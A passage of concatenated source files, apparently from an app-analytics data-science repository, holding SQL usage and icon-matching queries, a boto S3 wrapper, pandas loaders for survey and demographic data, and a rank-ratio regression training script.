edw.fact_app_weekly fam
join edw.dim_guid_weekly dgm
using(utc_date_key, guid_key)
join edw.dim_operator dop
on dgm.home_operator_key = dop.operator_key
join edw.dim_package dp
using(package_key)
where
fam.utc_date_key = 20150412
and dop.iso_country_code = 'us'
and not dgm.has_bad_record
and (fam.reported_screen_time or fam.reported_days_running)
and dgm.days_with_records >= 5
;<file_sep>/aa_au_model/hive_scripts/workflow/module/s3.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import boto
from boto.s3.connection import S3Connection
class S3Exception(Exception):
pass
class S3Storage(object):
def __init__(self, aws_access_key_id, aws_secret_access_key):
self.aws_access_key_id = aws_access_key_id
self.aws_secret_access_key = aws_secret_access_key
self.conn = None
def get_connection(self):
if not self.conn:
self.conn = S3Connection(
self.aws_access_key_id,
self.aws_secret_access_key
)
return self.conn
def get(self, bucket_name, key_name, content_type=None):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.new_key(key_name)
if content_type:
key.set_metadata("Content-Type", content_type)
return key.get_contents_as_string()
except boto.exception.S3ResponseError as ex:
if ex.status == 404:
return None
else:
raise S3Exception(ex)
except Exception as ex:
raise S3Exception(ex)
def get_contents_to_filename(self, bucket_name, key_name, file_name, content_type=None):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.new_key(key_name)
if content_type:
key.set_metadata("Content-Type", content_type)
key.get_contents_to_filename(file_name)
except boto.exception.S3ResponseError as ex:
if ex.status == 404:
return None
else:
raise S3Exception(ex)
except Exception as ex:
raise S3Exception(ex)
def copy(self, dst_bucket, dst_key, src_bucket, src_key):
bucket = self.get_connection().get_bucket(dst_bucket, validate=False)
try:
bucket.copy_key(dst_key, src_bucket, src_key)
return True
except Exception as ex:
raise S3Exception(ex)
def exists(self, bucket_name, key_name):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.get_key(key_name)
return key is not None
except Exception as ex:
raise S3Exception(ex)
def put(self, bucket_name, key_name, data, content_type=None, public=False):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.new_key(key_name)
if content_type:
key.set_metadata("Content-Type", content_type)
key.set_contents_from_string(data)
if public:
key.make_public()
except Exception as ex:
raise S3Exception(ex)
def delete(self, bucket_name, key_name):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.new_key(key_name)
key.delete()
except Exception as ex:
raise S3Exception(ex)
def list(self, bucket_name, prefix=''):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
for key in bucket.list(prefix=prefix):
yield key.name
except Exception as ex:
raise S3Exception(ex)
def size(self, bucket_name, prefix=''):
s = 0
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
for key in bucket.list(prefix=prefix):
s += key.size
return s
except Exception as ex:
raise S3Exception(ex)
def set_contents_from_filename(self, bucket_name, key_name, file_name, content_type=None, public=False):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.new_key(key_name)
if content_type:
key.set_metadata("Content-Type", content_type)
key.set_contents_from_filename(file_name)
if public:
key.make_public()
except Exception as ex:
raise S3Exception(ex)
def update_storage_to_rrs(self, bucket_name, prefix=''):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
for key in bucket.list(prefix=prefix):
if key.storage_class != 'REDUCED_REDUNDANCY':
key.copy(key.bucket.name, key.name, reduced_redundancy=True)
except Exception as ex:
raise S3Exception(ex)<file_sep>/icon-matching-framework/analysis_script.sql
-- DROP TEMPORARY TABLE IF EXISTS temp.hm_test;
-- CREATE TEMPORARY TABLE temp.hm_test
-- SELECT
-- m1.appstore_id as from_market,
-- m1.application_id as from_app_id,
-- m2.appstore_id as to_market,
-- m2.application_id as to_app_id,
-- HEX(m1.icon_hash) as from_hash,
-- HEX(m2.icon_hash) as to_hash,
-- BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,1,8)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,1,8)),16,10) AS UNSIGNED INTEGER))+
-- BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,9,8)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,9,8)),16,10) AS UNSIGNED INTEGER))+
-- BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,17,2)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,17,2)),16,10) AS UNSIGNED INTEGER)) as diff
-- FROM
-- app_matching_dev.matched_applications m1
-- JOIN app_matching_dev.matches a ON
-- m1.appstore_id = a.from_appstore_id AND
-- m1.application_id= a.from_application_id
-- JOIN app_matching_dev.matched_applications m2 ON
-- m2.appstore_id = a.to_appstore_id AND
-- m2.application_id= a.to_application_id
-- UNION
SELECT
m1.appstore_id as from_market,
m1.application_id as from_app_id,
m2.appstore_id as to_market,
m2.application_id as to_app_id,
HEX(m1.icon_hash) as from_hash,
HEX(m2.icon_hash) as to_hash,
BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,1,8)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,1,8)),16,10) AS UNSIGNED INTEGER))+
BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,9,8)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,9,8)),16,10) AS UNSIGNED INTEGER))+
BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,17,2)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,17,2)),16,10) AS UNSIGNED INTEGER)) as diff
FROM
app_matching_dev.matched_applications m1
JOIN app_matching_dev.matched_applications m2 ON
m2.appstore_id <> m1.appstore_id
JOIN app_matching_dev.matches a ON
m1.appstore_id = a.from_appstore_id AND
m1.application_id = a.from_application_id AND
m2.appstore_id == a.to_appstore_id AND
m2.application_id <> a.to_application_id
LIMIT 10
;<file_sep>/aa_au_model/correction/data.py
# -*- coding: utf-8 -*-
__author__ = 'hgriffioen'
import ast
import db
import datetime
import glob
import numpy as np
import pandas as pd
import warnings
from constants import DATA_FOLDER
from constants import DATA_VERSION
from constants import ISO_CODE
from constants import SAMPLE_BUCKET_PATH
from constants import MDM_BUCKET_PATH
from lib import import_data
AGE_BINS = [0, 24, 34, 44, 54, 150]
AGE_BIN_LABELS = ['13-24', '25-34', '35-44', '45-54', '55+']
ADX_EXPRESSION = SAMPLE_BUCKET_PATH + 'EXTERNAL_DATA/ADX/*/first_connection/part*'
ADX_COLUMNS = ['device_id', 'bundle_id', 'datestr', 'source', 'age_from', 'age_to', 'is_male', 'country']
QUESTIONNAIRE_DIR = SAMPLE_BUCKET_PATH + 'USER_SURVEY/'
QUESTIONNAIRE_COLUMNS = ['device_id', 'bundle_id', 'source', 'timestamp', 'question_id', 'answer', 'country']
QUESTIONNAIRE_INVERSE_ANSWER_MAPPING = {
'male': ['Male', '男性', 'Muž', 'Männlich', 'Masculino', 'Homme', 'Uomo', '남성', 'Masculino', 'Homem',
'Мужской', 'Erkek', '男性', '男性'],
'female': ['Female', '女性', 'Žena', 'Weiblich', 'Femenino', 'Femme', 'Donna', '여성', 'Feminino', 'Mulher',
'Женский', 'Kadın', '女性', '女性'],
'13-17': ['13-17'],
'18-24': ['18-24'],
'25-34': ['25-34'],
'35-44': ['35-44'],
'45-54': ['45-54', '45-55'],
'55+': ['55+', '55'],
}
QUESTIONNAIRE_INVERSE_QUESTION_MAPPING = {
'gender': ['male', 'female'],
'age': ['13-17', '18-24', '25-34', '35-44', '45-54', '55+'],
}
QUESTIONNAIRE_AGE_BIN_MAPPING = {
'13-17': '13-24',
'18-24': '13-24',
'25-34': '25-34',
'35-44': '35-44',
'45-54': '45-54',
'55+': '55+'
}
FB_INSIGHTS_EXPRESSION = SAMPLE_BUCKET_PATH + 'EXTERNAL_DATA/FB_INSIGHTS/*/*'
FB_INSIGHTS_COLUMNS = ['date', 'bundle_id', 'count', 'age_from', 'age_to', 'is_male', 'network']
DPI_APPS_BASE_PATH = SAMPLE_BUCKET_PATH + 'VPN_DPI_APPS/'
DPI_APPS_COLUMNS = ['app_id', 'version', 'country', 'app_name', 'bundle_id', 'category', 'type', 'is_native',
'timestamp', 'load_devices']
VALID_ZERO_SECOND_SESSION_APPS = ['com.google.Translate', 'com.sgn.cookiejam',
'com.bitrhymes.bingo2', 'com.weplaydots.twodots']
DPI_CONFLICT_PATH = 'dpi_conflict_apps.csv'
USAGE_PATH = 'device_bundleids_weekly.tsv'
USAGE_COLUMNS = ['datestr', 'device_id', 'bundle_id']
ACTIVE_PATH = 'active_devices_{time_frame}.csv'
ACTIVE_COLUMNS = ['end_date', 'device_id']
PROBABILITIES_DIR = SAMPLE_BUCKET_PATH + 'USAGE_MODEL_METRICS/DEVICE_AGE_GENDER_PREDICTION/WEEK/v1.0.0/US/'
PROBABILITIES_COLUMNS = ['device_id', 'platform', 'device_type', 'gender_dict']
ACTIVE_USERS_DIR = SAMPLE_BUCKET_PATH + 'USAGE_MODEL_METRICS/AU_{time_frame}/' + DATA_VERSION + '/'
ACTIVE_USERS_COLUMNS = ['app_id', 'end_date', 'platform', 'device_type', 'country', 'users',
'sample_size', 'user_proportion', 'au_v2', 'au_v1', 'composition_dict',
'error', 'data_check1', 'change', 'data_check2', 'au_2_int', 'data_check3']
MDM_POPULATION_SIZE_DIR = MDM_BUCKET_PATH + 'PS_MONTH/'
MDM_POPULATION_SIZE_COLUMNS = ['bundle_id', 'end_date', 'platform', 'device_type', 'country', 'reporters_all']
MDM_ACTIVE_USERS_DIR = MDM_BUCKET_PATH + 'AU_MONTH/'
MDM_ACTIVE_USERS_COLUMNS = ['bundle_id', 'end_date', 'platform', 'device_type', 'country', 'mdm_v1']
MDM_USAGE_PENETRATION_DIR = MDM_BUCKET_PATH + 'UP_MONTH/'
MDM_USAGE_PENETRATION_COLUMNS = ['bundle_id', 'end_date', 'platform', 'device_type', 'country', 'proportion']
def load_adx(age_bins=AGE_BINS, age_labels=AGE_BIN_LABELS):
"""
Load all available AD-X data.
Note: age bin assignment is done by dividing average bin ages
of AD-X using the input parameters.
:param age_bins: Bins to use for pd.cut
:param age_labels: Labels to assign for pd.cut
:return: DataFrame with AD-X data.
"""
adx_paths = glob.glob(ADX_EXPRESSION)
adx = pd.concat([pd.read_table(p, names=ADX_COLUMNS, na_values=[None, 'None']) for p in adx_paths],
ignore_index=True)
adx = adx[adx['source'] == 'Facebook']
adx['date'] = pd.to_datetime(adx['datestr'])
# Assign AD-X bins to survey bins using average AD-X age in bin.
adx['age_bin'] = pd.cut((adx.age_to + adx.age_from) / 2, age_bins, labels=age_labels).astype('string')
# Account for nan's in is_male
adx['gender'] = np.nan
adx.loc[adx.is_male.notnull() & adx.is_male, 'gender'] = 'male'
adx.loc[~(adx.is_male.isnull() | adx.is_male), 'gender'] = 'female'
return adx.drop_duplicates(['device_id', 'source', 'age_from', 'age_to', 'is_male'])
def load_questionnaire(base_dir=QUESTIONNAIRE_DIR, app_name='VPN', age_bin_mapping=QUESTIONNAIRE_AGE_BIN_MAPPING):
"""
Load results of app questionnaire.
:param base_dir: root dir with questionnaire results
:param age_bin_mapping: Mapping to align age_bins (if None, keep original)
:return: DataFrame with questionnaire results
"""
questionnaire_paths = glob.glob(base_dir + app_name + '/*/*/part*')
df = pd.concat((pd.read_table(p, names=QUESTIONNAIRE_COLUMNS)
for p in questionnaire_paths), ignore_index=True)
df.dropna(subset=['answer', 'question_id'], inplace=True)
df = _parse_questionnaire(df)
# Remove devices with more than 1 distinct answer per question
# NB: Allows users to answer questions on different time points
n_answers = df.groupby(['device_id', 'question']).answer.nunique()
has_single_answers = (n_answers == 1).groupby(level=0).all()
valid_devices = has_single_answers[has_single_answers].index
df = df.loc[df.device_id.isin(valid_devices)]
df.sort(['device_id', 'bundle_id', 'question', 'date'], inplace=True)
df.drop_duplicates(['device_id', 'bundle_id', 'question'], take_last=True, inplace=True)
# Convert to wide format to align with AD-X.
questionnaire = pd.pivot_table(df, index=['device_id', 'bundle_id', 'source', 'country'],
columns='question', values='answer', aggfunc=lambda x: x)
questionnaire.rename(columns={'age': 'age_bin'}, inplace=True)
# Get one single date for a device.
max_device_date = df.groupby('device_id')['date'].max()
questionnaire = pd.merge(questionnaire.reset_index(), max_device_date.reset_index())
# Map age bins if mapping is given.
if age_bin_mapping:
questionnaire['age_bin'] = questionnaire.age_bin.map(age_bin_mapping)
return questionnaire
def _parse_questionnaire(df):
"""
Parse the questionnaire: map questions, answers, dates and countries.
:param df: DataFrame with raw questionnaire data.
:return: Parsed DataFrame
"""
reverse_mapper = lambda x: {m: k for k, v in x.items() for m in v}
# Map answers.
# Assume (naively) that the answer is either a single answer or that the part before
# the first whitespace is the answer.
df['answer'] = df.answer.str.split(' ').apply(lambda x: x[0])
df['answer'] = df.answer.str.replace('~', '-') # Japanese uses ~ instead of -
filter_values = ['$0 - $25,000', '\\N', 'Prefer not to say', 'Prefer', '$0']
valid_answers = filter_values + [i for l in QUESTIONNAIRE_INVERSE_ANSWER_MAPPING.values() for i in l]
unknown_answers = df.loc[~df.answer.isin(valid_answers), 'answer'].unique()
if unknown_answers.any():
warnings.warn("Removing unknown answers:\n{}".format(",".join(unknown_answers)), RuntimeWarning)
df['answer'] = df.answer.map(reverse_mapper(QUESTIONNAIRE_INVERSE_ANSWER_MAPPING))
df.dropna(subset=['answer'], inplace=True) # Remove invalid answers
# Map questions.
df['question'] = df.answer.map(reverse_mapper(QUESTIONNAIRE_INVERSE_QUESTION_MAPPING))
has_no_question = df.question.isnull()
if has_no_question.any():
answers_without_questions = df.loc[has_no_question, 'answer'].unique()
warnings.warn("Removing answers without questions: {}".format(",".join(answers_without_questions)),
RuntimeWarning)
df.dropna(subset=['question'], inplace=True) # Remove invalid questions
# Assign date and assign 'Unknown' to missing countries
df['date'] = pd.to_datetime(df['timestamp'], unit='ms')
df.country.fillna('Unknown', inplace=True)
return df
def load_facebook_insights(age_bins=AGE_BINS, age_labels=AGE_BIN_LABELS):
"""
Load Facebook Insights data.
:param age_bins: Bins to use for pd.cut
:param age_labels: Labels to assign for pd.cut
:return: DataFrame with AD-X data.
"""
facebook_paths = glob.glob(FB_INSIGHTS_EXPRESSION)
facebook = pd.concat([pd.read_table(p, names=FB_INSIGHTS_COLUMNS, parse_dates=[0]) for p in facebook_paths],
ignore_index=True)
# Assign bins to survey bins using average age in bin.
facebook['age_bin'] = pd.cut((facebook.age_to + facebook.age_from) / 2, age_bins, labels=age_labels)
facebook['gender'] = facebook.is_male.apply(lambda x: 'male' if x else 'female' if pd.notnull(x) else None)
notnull_data = facebook[facebook.gender.notnull() & facebook.age_bin.notnull()].copy()
data_groups = notnull_data.groupby(['date', 'bundle_id', 'age_bin', 'gender'])
return data_groups['count'].sum().reset_index()
def load_dpi_apps(dpi_date=datetime.datetime.now().date(), cols=['app_name', 'app_id', 'bundle_id', 'category'],
do_query_companies=False, **kwargs):
"""
Load DPI app info.
:param dpi_date: datetime.date with date to load data for
:param cols: Columns to keep from the DPI table
:param do_query_companies: Boolean indicating if company info should be retrieved from the DB
:param **kwargs: Keyword arguments for query_companies(), if querying companies:
- username: DB user name
- password: <PASSWORD>
:return: DataFrame with DPI app info
"""
path = (DPI_APPS_BASE_PATH + dpi_date.strftime('%Y-%m-%d') + '/part-m-00000.gz')
dpi_apps = pd.read_table(path, names=DPI_APPS_COLUMNS, compression='gzip')
dpi_apps = dpi_apps[cols]
if do_query_companies:
bundle_ids = dpi_apps.bundle_id.values
companies = query_companies(bundle_ids, **kwargs)
dpi_apps = pd.merge(dpi_apps, companies, how='left')
return dpi_apps.drop_duplicates(['bundle_id'])
def load_valid_zero_second_session_apps():
"""
Load valid zero second session apps
:return: List with bundle IDs
"""
return VALID_ZERO_SECOND_SESSION_APPS
def load_dpi_conflict_apps(dpi_conflict_path=DPI_CONFLICT_PATH, data_folder=DATA_FOLDER):
"""
Load all apps with DPI conflicts.
:param dpi_conflict_path: Path to csv file
:param data_folder: Path to data folder
:return: DataFrame with bundle IDs for iPhone and iPad
"""
return pd.read_csv(data_folder + dpi_conflict_path)
def query_companies(bundle_ids, username=None, password=<PASSWORD>):
"""
Query companies for apps from DB.
:param bundle_ids: List of bundle ID's to query companies for
:param username: DB username
:param password: <PASSWORD>
:return: DataFrame with company info
"""
assert username is not None and password is not None, "Username or password not specified"
aa_db = db.DB(username=username, password=<PASSWORD>, hostname='ds-db-1.appannie.org',
dbname='aa', dbtype='postgres')
query = """
select
bundle_id,
company
from
aa_app
where
bundle_id in ('{bundle_ids}')
""".format(bundle_ids="','".join(bundle_ids))
companies = aa_db.query(query)
return companies
def load_usage(usage_path=USAGE_PATH, chunk_size=None, data_folder=DATA_FOLDER):
"""
Load usage data.
:param usage_path: Path to usage data
:param chunk_size: Number of lines in each chunk
:param data_folder: Path to data folder
:return: DataFrame with app used per device and date
"""
if chunk_size is None:
usage = pd.read_csv(data_folder + usage_path, delimiter='\t', names=USAGE_COLUMNS, usecols=USAGE_COLUMNS)
usage['date'] = pd.to_datetime(usage.datestr).dt.date
usage.drop('datestr', axis=1, inplace=True)
else:
reader = pd.read_csv(usage_path, delimiter='\t', names=USAGE_COLUMNS,
usecols=USAGE_COLUMNS, chunksize=chunk_size)
first_go = True
for tmp_df in reader:
tmp_df['date'] = pd.to_datetime(tmp_df.datestr).dt.date
tmp_df.drop('datestr', axis=1, inplace=True)
if first_go:
usage = tmp_df.copy()
first_go = False
else:
usage = pd.concat([usage, tmp_df], ignore_index=True)
return usage
def load_devices(date=None, bucket_path=SAMPLE_BUCKET_PATH, iso_code=ISO_CODE, begin_date=None):
"""
Load load_devices up to a date.
:param date: datetime.date (if None, uses yesterday)
:param bucket_path: path to bucket
:param iso_code: iso code to load data for
:param begin_date: datetime.date with first date to load data for (load all if None)
:return: DataFrame with info of load_devices
"""
# Select first valid date for country (to remove testing devices, etc.).
if begin_date:
begin_datestr = begin_date.strftime('%Y%m%d')
else:
if iso_code == 'US':
begin_datestr = '20141023'
elif iso_code == 'GB':
begin_datestr = '20150813'
else:
raise Exception("Unsupported iso_code: {}".format(iso_code))
if date is None:
date = datetime.datetime.now().date() - datetime.timedelta(days=1)
end_datestr = date.strftime('%Y%m%d')
temp = import_data.import_data(begin_datestr, end_datestr, 'device_info',
bucketdir=bucket_path, iso_code=iso_code)
return temp.drop_duplicates('device_id', take_last=True)
def load_active_devices(start_date, end_date, data_folder=DATA_FOLDER):
"""
Load active devices from file for a time period. Time period can be a week or a month.
:param start_date: datetime.date
:param end_date: datetime.date
:param data_folder: Path to data folder
:return: Series with active devices
"""
next_period_start = (end_date + datetime.timedelta(days=1))
# Determine whether to load monthly or weekly active devices.
if start_date == next_period_start.replace(month=start_date.month, year=start_date.year):
time_frame = 'monthly'
elif ((end_date - start_date).days + 1) == 7:
time_frame = 'weekly'
else:
raise Exception('Unsupported time period')
active_devices_path = data_folder + ACTIVE_PATH.format(time_frame=time_frame)
all_active_devices = pd.read_table(active_devices_path, names=ACTIVE_COLUMNS, parse_dates=[0])
if ~(all_active_devices.end_date == end_date).any():
raise Exception('end_date not in file')
active_devices = all_active_devices[all_active_devices.end_date == end_date]
return active_devices['device_id'].reset_index(drop=True).copy()
def load_all_active_devices(time_frame, data_folder=DATA_FOLDER):
"""
Load all active devices for a given time frame.
:param time_frame: 'weekly' or 'monthly'
:param data_folder: Path to data folder
:return: DataFrame with end_date and devic_id
"""
assert time_frame in ('weekly', 'monthly'), ('Unknown time frame: %s' % time_frame)
active_devices_path = data_folder + ACTIVE_PATH.format(time_frame=time_frame)
active_devices = pd.read_table(active_devices_path, names=ACTIVE_COLUMNS, parse_dates=[0])
active_devices.end_date = active_devices.end_date.dt.date
return active_devices
def load_probabilities(base_dir=PROBABILITIES_DIR):
"""
Load estimated probabilities per device.
:param base_dir: root dir in which device probabilities are stored per time interval
:return: DataFrame with probabilities per device
"""
sub_dirs = glob.glob(base_dir + '*')
probabilities = pd.DataFrame()
for sub_dir in sub_dirs:
files = glob.glob(sub_dir + '/part*')
data = pd.DataFrame()
for proba_file in files:
data_file = pd.read_table(proba_file, names=PROBABILITIES_COLUMNS)
data = data.append(data_file, ignore_index=True)
data['end_date'] = datetime.datetime.strptime(sub_dir, base_dir + '%Y-%m-%d')
probabilities = probabilities.append(data, ignore_index=True)
proba_df = pd.DataFrame.from_dict([ast.literal_eval(i) for i in probabilities.gender_dict.values])
probabilities[proba_df.columns] = proba_df
probabilities = probabilities[probabilities.columns[probabilities.columns != 'gender_dict']]
return probabilities
def load_active_users(time_frame, base_dir=ACTIVE_USERS_DIR):
"""
Load active users per app.
:param time_frame: Time Frame to load ('weekly' or 'monthly')
:param base_dir: root dir in which active users are stored per time interval
:return: DataFrame with active users per app
"""
def load_table(p):
df = pd.read_table(p, parse_dates=[1], names=ACTIVE_USERS_COLUMNS)
df.dropna(how='all', axis=1, inplace=True)
return df if df.shape[1] == len(ACTIVE_USERS_COLUMNS) else None
if time_frame == 'weekly':
data_dir = base_dir.format(time_frame='WEEK')
elif time_frame == 'monthly':
data_dir = base_dir.format(time_frame='MONTH')
else:
raise Exception('Unknown time frame %s' % time_frame)
print 'Data Directory', data_dir
active_users_paths = glob.glob(data_dir + '*/US/part*')
print 'Active Users Path:', active_users_paths
active_users = pd.concat([load_table(p) for p in active_users_paths], ignore_index=True)
composition = pd.DataFrame.from_dict([ast.literal_eval(i) for i in
active_users.composition_dict.values])
active_users[composition.columns] = composition
return active_users.drop('composition_dict', axis=1)
def load_mdm_data(country='US', version=None, base_dir=MDM_POPULATION_SIZE_DIR, headers=MDM_POPULATION_SIZE_COLUMNS):
"""
Load MyDM data.
Requires following file structure:
base_dir/version/country/filename
:param country: country for which data is retreived
:param base_dir: root dir in which active users are stored per time interval
:param headers: headers of the selected mdm data table
:return DataFrame with mdm data
"""
if version is None:
version = '*'
def _build_path(row):
return '/'.join([row['root'], row['version'], row['date'], row['country'], row['fname']])
columns = headers
files = glob.glob(base_dir+version+'/*/'+country+'/*')
files_df = pd.DataFrame([x.rsplit('/', 4) for x in files], columns=['root', 'version', 'date', 'country', 'fname'])
# To find the latest version is tricky. Have to revisit this part
grouped = files_df.groupby('date', as_index=False).agg({'version': 'max'}).rename(columns={'version': 'latest_version'})
files_df = pd.merge(files_df, grouped, on=['date'])
files_df = files_df[files_df['version'] == files_df['latest_version']]
files_df['path'] = files_df.apply(_build_path, axis=1)
files = files_df.path.tolist()
data = pd.DataFrame()
for au_file in files:
data_file = pd.read_table(au_file, parse_dates=[1], header=-1)
data_file.columns = columns
data = data.append(data_file, ignore_index=True)
return data
def load_mdm_penetration(country='US'):
"""
Load monthly penetration per app based on MyDM data.
:param country: country for which data is retreived
"""
if country=='WW':
# Vancouver team has implemented different logics to calcuate WW usage penetration
au_penetration = load_mdm_data(country=country, base_dir=MDM_USAGE_PENETRATION_DIR, headers=MDM_USAGE_PENETRATION_COLUMNS)
else:
all_reporters = load_mdm_data(country=country, version='v1.0.0')
penetrations = load_mdm_data(country=country, version='v1.0.0', base_dir=MDM_USAGE_PENETRATION_DIR, headers=MDM_USAGE_PENETRATION_COLUMNS)
au_penetration = pd.merge(all_reporters, penetrations, on=['bundle_id', 'end_date', 'platform', 'device_type', 'country'])
au_penetration['reporters_app'] = au_penetration['reporters_all'] * au_penetration['proportion']
mdm_v1 = load_mdm_data(country=country, version='v1.1.0', base_dir=MDM_ACTIVE_USERS_DIR, headers=MDM_ACTIVE_USERS_COLUMNS)
au_penetration = pd.merge(au_penetration, mdm_v1, on=['bundle_id', 'end_date', 'platform', 'device_type', 'country'])
return au_penetration
<file_sep>/aa_au_model/lib/__init__.py
__author__ = 'hkoekkoek'
<file_sep>/universals/train_reg_models.py
'''
Created on Jun 6, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import os
import matplotlib.pyplot as plt
import config
from sklearn import linear_model
import pickle
from sklearn.svm import SVR
from sklearn import linear_model
import matplotlib as mpl
def load_values(path, store_ids=None, units=None, feed_ids=None):
df = pd.DataFrame()
for (dirpath, dirnames, filenames) in os.walk(path):
for filename in filenames:
if filename.endswith('.csv'):
f_data = filename.split('_')
s_id = np.int64(f_data[0])
unit = f_data[1].lower()
try:
f_id = np.int64(f_data[1])
except:
f_id = None
if units is not None and unit not in units:
continue
if store_ids is not None and s_id not in store_ids:
continue
if feed_ids is not None and f_id not in feed_ids:
continue
dfb = pd.read_csv(os.sep.join([dirpath, filename]))
dfb['store_id'] = s_id
if f_id is None:
dfb['unit'] = unit
df = df.append(dfb)
return df
def get_low_error_apps(estimates, actuals, max_error):
usd = estimates[(estimates['feed_id']==2) | (estimates['feed_id']==102)].drop('feed_id', axis=1)
usd = usd.groupby(['date', 'app_id']).sum().reset_index()
usd['unit'] = 'usd'
df = actuals.merge(usd, on=['app_id', 'date', 'store_id', 'unit'])
df['rel_error'] = (df['units'] - df['estimate']).abs() / df['units']
df = df[df['rel_error']<=max_error][['date', 'app_id']].drop_duplicates()
return df
def reshape_to_ranks(df):
free = pd.merge(df[df['feed_id']==0], df[df['feed_id']==101], on=['date', 'app_id', 'store_id', 'category_id'], suffixes=['_iphone', '_ipad'])
paid = pd.merge(df[df['feed_id']==1], df[df['feed_id']==100], on=['date', 'app_id', 'store_id', 'category_id'], suffixes=['_iphone', '_ipad'])
grossing = pd.merge(df[df['feed_id']==2], df[df['feed_id']==102], on=['date', 'app_id', 'store_id', 'category_id'], suffixes=['_iphone', '_ipad'])
df = pd.concat([free, paid, grossing]).drop('feed_id_ipad', axis=1)
df.rename(columns={'feed_id_iphone':'feed_id'}, inplace=True)
return df
def plot_error_by_category(df):
df = df.groupby(['store_id', 'feed_id'])
for n, g in df:
ax = g.boxplot(column='rel_error', by='category_id')
labels = []
for tick in ax.xaxis.get_major_ticks():
tick.label.set_rotation('vertical')
labels.append(config.IOS_CATEGORIES_DICT[int(tick.label.get_text())])
ax.set_xticklabels(labels)
ax.set_ylabel('relative_error')
country = config.IOS_STORES_DICT[n[0]]
feed = config.IOS_FEEDS_DICT[n[1]].replace('IPHONE_', '')
ax.set_title('%s_%s'%(country, feed))
ax.set_ylim(0, 1.0)
plt.savefig('%s/relative_error_%s_%s_%s.png'%(plots_dir, month, country, feed))
def plot_count_by_error(df):
df = df[df['rel_error']<=1]
df = df.groupby(['store_id', 'feed_id', 'category_id'])
for n, g in df:
g.hist(column='rel_error')
country = config.IOS_STORES_DICT[n[0]]
feed = config.IOS_FEEDS_DICT[n[1]].replace('IPHONE_', '')
category = config.IOS_CATEGORIES_DICT[n[2]]
plt.title('%s_%s_%s'%(country, category, feed))
plt.ylabel('count')
plt.xlabel('relative_error')
#plt.show()
plt.savefig('%s/error_count_%s_%s_%s_%s.png'%(plots_dir, month, country, category, feed))
def gen_reg_models(df):
df = df.groupby(['store_id', 'feed_id', 'category_id'])
models = pd.DataFrame()
for n, g in df:
country = config.IOS_STORES_DICT[n[0]]
feed = config.IOS_FEEDS_DICT[n[1]].replace('IPHONE_', '')
category = config.IOS_CATEGORIES_DICT[n[2]]
x = g[['rank_iphone', 'rank_ipad']].values
y = g['iphone_ratio'].values
regr = linear_model.LinearRegression()
regr.fit(x, y)
params = regr.coef_
c = regr.intercept_
score = None
try:
score = regr.score(x,y)
except:
pass
model = {'store_id': [n[0]],
'feed_id': [n[1]],
'category_id': [n[2]],
'iphone_param': [params[0]],
'ipad_param': [params[1]],
'constant': [c],
'split_score':[score],
'train_samples':[g.shape[0]]
}
model = pd.DataFrame(model)
models = models.append(model)
#plt.plot(x[:,0], y, 'o', label='Original data')
#plt.plot(x[:,0], regr.predict(x), 'o', label='Fitted line')
#plt.title('%s_%s_%s_%s'%(country, category, feed, regr.score(x,y)))
#plt.show()
return models
def plot_ratios(df, month=None):
df = df.groupby(['store_id', 'category_id', 'feed_id'])
for n, g in df:
plt.clf()
plt.clf()
fig = plt.figure()
ax = fig.add_subplot(111)
country = config.IOS_STORES_DICT[n[0]]
feed = config.IOS_FEEDS_DICT[n[2]].replace('IPHONE_', '')
category = config.IOS_CATEGORIES_DICT[n[1]]
if month==None:
title='%s_%s_%s.png'%(country, category, feed)
else:
title='%s_%s_%s_%s.png'%(month, country, category, feed)
plt.scatter(g['rank_iphone'], g['rank_ipad'], c=g['iphone_ratio'], s=50, cmap=mpl.cm.hot_r)
ax.set_title(title+ ' count=%s'%g.shape[0])
ax.set_xlabel('iPhone Ranks')
ax.set_ylabel('iPad Ranks')
ax.grid()
#ax.set_xscale('log')
#ax.set_yscale('log')
plt.ylim(0, 500)
plt.xlim(0, 1000)
cbar = plt.colorbar()
cbar.set_label(r'iPhone Ratio')
plt.savefig('./plots/%s'%title)
#plt.show()
def train_models(df, algorithm):
df = df.groupby(['store_id', 'category_id', 'feed_id'])
models = {}
for n, g in df:
model = None
try:
model = algorithm.fit(g[['rank_iphone', 'rank_ipad']], g['iphone_ratio'])
except:
pass
models[n] = model
return models
if __name__ == '__main__':
plots_dir = 'plots'
model = 'ios_monthly'
month = '2013-07'
#algorithm = SVR(kernel='rbf', C=1e3, gamma=0.1)
algorithm = linear_model.LinearRegression()
algo_name = 'linear'
store_id = None
unit = None
feed_id = None
#store_id = [143465]
#unit = ['usd']
#feed_id = [2,102]
main_dir = '/home/rafael/appannie/data_science/evaluation/data/%s/%s'%(model, month)
estimates_dir = '%s/est_daily_raw'%main_dir
actuals_dir = '%s/real_daily_raw'%main_dir
estimates = load_values(estimates_dir, store_ids=store_id, feed_ids=feed_id)
actuals = load_values(actuals_dir, store_ids=store_id, units=unit)
